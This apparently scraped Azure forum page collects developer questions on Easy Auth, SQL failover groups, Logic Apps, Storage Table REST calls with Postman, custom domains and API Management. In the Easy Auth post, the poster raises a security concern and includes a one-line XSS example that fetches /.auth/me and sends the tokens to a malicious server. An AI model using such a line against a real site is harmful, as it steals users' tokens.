Forum Widgets
Latest Discussions
App Service Easy auth and disabling /.auth/me
I plan on using Easy Auth with a ASP.NET Core web application hosted on Azure App Service with the Linux flavor. From my understanding Easy Auth adds a couple of endpoints to the app service: /.auth/login/<provider>/callback /.auth/logout /.auth/me Usually when I use OpenID Connect and OAuth 2.0 I always opt for the authorization code flow to avoid users having direct access to their tokens (id_token/access_token/refresh_token) as the backend is capable of handling this through cookies in the browser and tokens stored elsewhere away from the user. I have enabled Easy Auth with the token stored for my application and it works as expected. My question is mainly concerned with the /.auth/me endpoint. This endpoint exposes all the tokens, along with the claims of the user. If I enable scopes for offline_access then refresh_token is also exposed here. From a security perspective this seems horrible as a simple XSS attack could read the tokens and ship them off to an attackers server. fetch("/.auth/me").then(r => r.json()).then(sendToMaliciousServer) My questions are: Can I disable this endpoint in Easy Auth to avoid the security issue while still maintaining access to having a token store? Is MSAL (or rather Microsoft.Identity.Web) dependant on this endpoint to be able to read out the access_token from the token store of Easy Auth before calling downstream services?
What is use of Read/write and Read-only listener endpoint in Failover Groups
Hi Team, Can someone help me to know use of Read/write and Read-only listener endpoint in Failover Groups in Azure SQL MI. 1. Can I use Name of Read/write listener endpoint in Connection String for Read/write and 2. Can I use Name of Read-only listener endpoint in connection String for Reporting purpose.
Azure Logic Apps vs Power Automate
Hello Experts, Please guide me in selecting the more suitable option between Azure Logic Apps and Power Automate for developing an Enterprise application that operates on a scheduled basis. This application must interact with multiple on-premises and SaaS systems by making several REST API calls (approximately 8 - 10 calls) and storing the retrieved data (structural and unstructured). Thanks -Sri
Use Azure Storage Table REST API with AAD token via PostMan
You can refer to below steps for scenarios in which you have an application special requirement and need to call raw Storage table REST API from your dev environment via Postman. It consists of two main HTTP requests: first, to authenticate directly using AD security principal to get access token, second an authenticated storage REST API call for Table Storage. Documentation related Query Entities REST API - https://docs.microsoft.com/en-us/rest/api/storageservices/query-entities Authorize access to tables using Azure Active Directory https://docs.microsoft.com/en-us/azure/storage/tables/authorize-access-azure-active-directory Prerequisites To follow the steps in this article you must have: Azure subscription An Azure AD tenant Registered application (AD Service principal) Steps to reproduce this scenario: Acquire oAuth 2.0 token: Created security principal for application (Azure portal > AAD > app registrations). Documentation reference: https://docs.microsoft.com/en-us/rest/api/servicebus/get-azure-active-directory-token#register-your-app-with-azure-ad Assigned Storage Table Data Reader role at storage account level to SP created in step #1 (wait for 30 mins) Used Postman to get the Azure AD token: Launch Postman. For the method, select GET. For the URI, enter https://login.microsoftonline.com/<TENANT ID>/oauth2/token. Replace <TENANT ID> with the tenant ID value you copied earlier. On the Headers tab, add Content-Type key and application/x-www-form-urlencoded for the value. Switch to the Body tab and add the following keys and values. Select form-data. Add grant_type key, and type client_credentials for the value. Add client_id key, and paste the value of client ID you noted down earlier. Add client_secret key, and paste the value of client secret you noted down earlier. Add resource key, and type https://storage.azure.com/ for the value Select Send to send the request to get the token. You see the token in the result. Save the token (excluding double quotes). You will use it later Called Query Entities storage REST API and passed the oAuth 2.0 token from previous step In Postman, open a new tab. Select GET for the method. Enter URI in the following format: https://<account>.table.core.windows.net /<table>(). Replace <account> with the name of the Storage Account name. Replace <table> with the name of the table. On the Headers tab, add the following three headers. Add Authorization key and value for it in the following format: Bearer <TOKEN from Azure AD>. When you copy/paste the token, don't copy the enclosing double quotes. Select Send to get the entities from table. You see the status as OK with the code 200 as shown in the following image.Azure Activity Log with no “Event Initiated by” value
I was working on Azure Public Cloud and found that there're some events in Activity Log with no Caller value as seen below. This is an example: Operation name: Update SQL database Time stamp: Sun Mar 07 2021 12:27:30 GMT+0700 (Indochina Time) Event initiated by: - The changes was made is earliestRestoreDate (Description :This records the earliest start date and time that restore is available for this database (ISO8601 format).) I want to know who initiate this event and wondering if this is a kind of system event. Can someone explain what is this event related to? Thank you!
Unable to setup Appservice to use custom domain purchased via Azure portal
I recently purchased a new custom domain to use with my AppService. I have done this before with out any problems. I have tried to set this up via two methods: 1) Add hostname binding within the Custom Domain blade. This fails with an error with no extra details. 2) Add custom domain within the App Server blade This fails on domain ownership and ask me to create a CNAME configuration record. I assume this is also why option 1) fails silently. I have tried this by entering the Advanced Management Portal on the Custom Domain blade but this does not give me access to add any DNS records, all I can do it edit the Nameservers. Help !!!! This means I am left with a domain I purchased that I cannot use and I cannot no longer buy this through an external provider so I can setup it up externally from Azure.Application Insights PHP SDK or Opentelemetry support
Hi everyone, We are using Symfony framework which is built based on PHP. Our application is hosted on App Service and so far we have been using the https://github.com/microsoft/ApplicationInsights-PHP, which is actually not maintained anymore. I have seen since a couple of months some updates regarding usage of OpenTelemetry to send data to Application Insights as another possibility than using SDK for a given stack. Is there any update on when OpenTelemetry with PHP is supported with Application Insights if this is not the case yet? Any example of implementation people could share? Thank you in advance for your help on this! Valentin.
API Management Policy - Secure way to detect requests from Application Gateway
Hello. We got API Management which is reachable from internal network, and from external network (internet) via Application Gateway. I want to add an authorization policy in an API which only applies if requests are coming from external network. Microsoft recommends NOT to use Host Header because it can be modified by the user (https://learn.microsoft.com/en-us/azure/architecture/best-practices/host-name-preservation#context). Is there a secure way to check if requests are coming from external network? Would "Context.Request.OriginalUrl.Host" work for this - or is the value a copy of the Host Header? (https://learn.microsoft.com/en-us/azure/api-management/api-management-policy-expressions#ContextVariables)Clean Architecture with DevSecOps
Hi Azure Developers and DevSecOps Enthusiasts, I would like to share my recent project hosted on GitHub. Clean Architecture with DevSecOps is the showcase project to present best DevSecOps practices together with Clean Architecture patterns for building ASP .NET Core Web APIs hosted on Microsoft Azure cloud. Clean Architecture with DevSecOps I hope you will find it interesting.
